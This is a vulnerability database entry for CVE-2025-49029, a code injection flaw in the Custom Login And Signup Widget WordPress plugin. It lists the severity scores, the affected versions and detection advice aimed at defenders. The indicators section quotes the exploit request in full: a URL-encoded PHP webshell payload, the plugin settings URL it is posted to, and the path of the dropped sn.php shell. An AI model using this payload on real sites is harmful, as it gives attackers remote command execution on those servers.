cbcvebase.
CVE-2025-49029
published 2025-07-01

CVE-2025-49029: Improper Control of Generation of Code ('Code Injection') vulnerability in bitto.kazi Custom Login And Signup Widget custom-login-and-signup-widget allows Code…

PriorityP260critical9.1CVSS 3.1
AVNACLPRHUINSCCHIHAH
EXPLOIT
EPSS
2.12%
79.6th percentile
Improper Control of Generation of Code ('Code Injection') vulnerability in bitto.kazi Custom Login And Signup Widget custom-login-and-signup-widget allows Code Injection.This issue affects Custom Login And Signup Widget: from n/a through <= 1.0.

Affected

1 ranges
VendorProductVersion rangeFixed in
bitto.kazicustom_login_and_signup_widget<= 1.0

Detection & IOCsextracted from sources · hover to see the quote

url/wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes
path/wp-content/plugins/custom-login-and-signup-widget/content/sn.php
filenamesn.php
commandtext=%3C%3Fphp+if%28isset%28%24_GET%5B%27cmd%27%5D%29%29+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E&submit=Submit
  • Detect exploitation attempts by monitoring POST requests to the plugin settings page with PHP webshell payloads in the `text` parameter
  • Monitor for GET requests to the dropped webshell at /wp-content/plugins/custom-login-and-signup-widget/content/sn.php, especially with a `cmd` query parameter
  • A successful exploitation results in HTTP 500 from the dropped sn.php file; correlate with prior POST to the settings page containing PHP code in the `text` field
  • Use publicwww/FOFA fingerprint to identify exposed vulnerable instances
  • The attack requires authentication as an administrator; look for admin login followed immediately by POST to the plugin settings page with PHP code in the body
  • ·Exploitation requires administrator-level authentication; unauthenticated exploitation is not possible with this CVE
  • ·Affected versions are Custom Login And Signup Widget from n/a through 1.0 only
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.